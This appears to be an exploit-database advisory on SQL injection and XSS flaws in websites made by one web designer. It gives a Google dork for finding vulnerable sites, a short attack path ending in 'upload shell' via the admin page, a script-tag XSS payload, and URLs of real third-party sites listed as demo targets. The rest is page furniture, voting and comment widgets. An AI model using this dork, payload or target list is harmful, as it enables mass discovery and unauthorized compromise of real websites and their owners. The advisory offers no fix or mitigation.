Yasha Zamanpour SQL Injection Vulnerability And XSS

2019.06.07

Mr Hashtag (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: "Designed & Developed By Yasha Zamanpour" or "طراحي و اجرا: ياشا زمانپور"

#######################
# Exploit Title: Yasha Zamanpour SQL Injection Vulnerability And XSS
# Exploit Author: MR (#)
# Vendor Homepage: www.zamanpour.com
# Google Dork: "Designed & Developed By Yasha Zamanpour" or "طراحي و اجرا: ياشا زمانپور"
# Tested On: Windows
# Exploit Risk: Medium
#######################
# SQL Injection
# 1_search google dork: "Designed & Developed By Yasha Zamanpour" or "طراحي و اجرا: ياشا زمانپور"
# 2_find target
# 3_admin page: /admin/main.php
# 4_upload shell
#
# demo:
#   http://iap.ir/new/index.php?m_id=723
#   http://www.isnutrition.ir/index.php?m_id=762
#   http://www.pladaplast.com/enindex.php?m_id=820
#######################
# XSS
#
# code: "/><script>alert('Xss By MR (#)')</script>
#
# demo:
#   http://www.visualartsjournal.ir
#   http://www.isnutrition.ir/
#   http://www.pladaplast.com/
#######################
# me:
#  mr_h4shtag
#######################
# thank to:
#  mr_b3hz4d
#######################

See this note in RAW Version

Vote for this issue:

75%

25%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Yasha Zamanpour SQL Injection Vulnerability And XSS

Dork: "Designed & Developed By Yasha Zamanpour" or "طراحي و اجرا: ياشا زمانپور"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.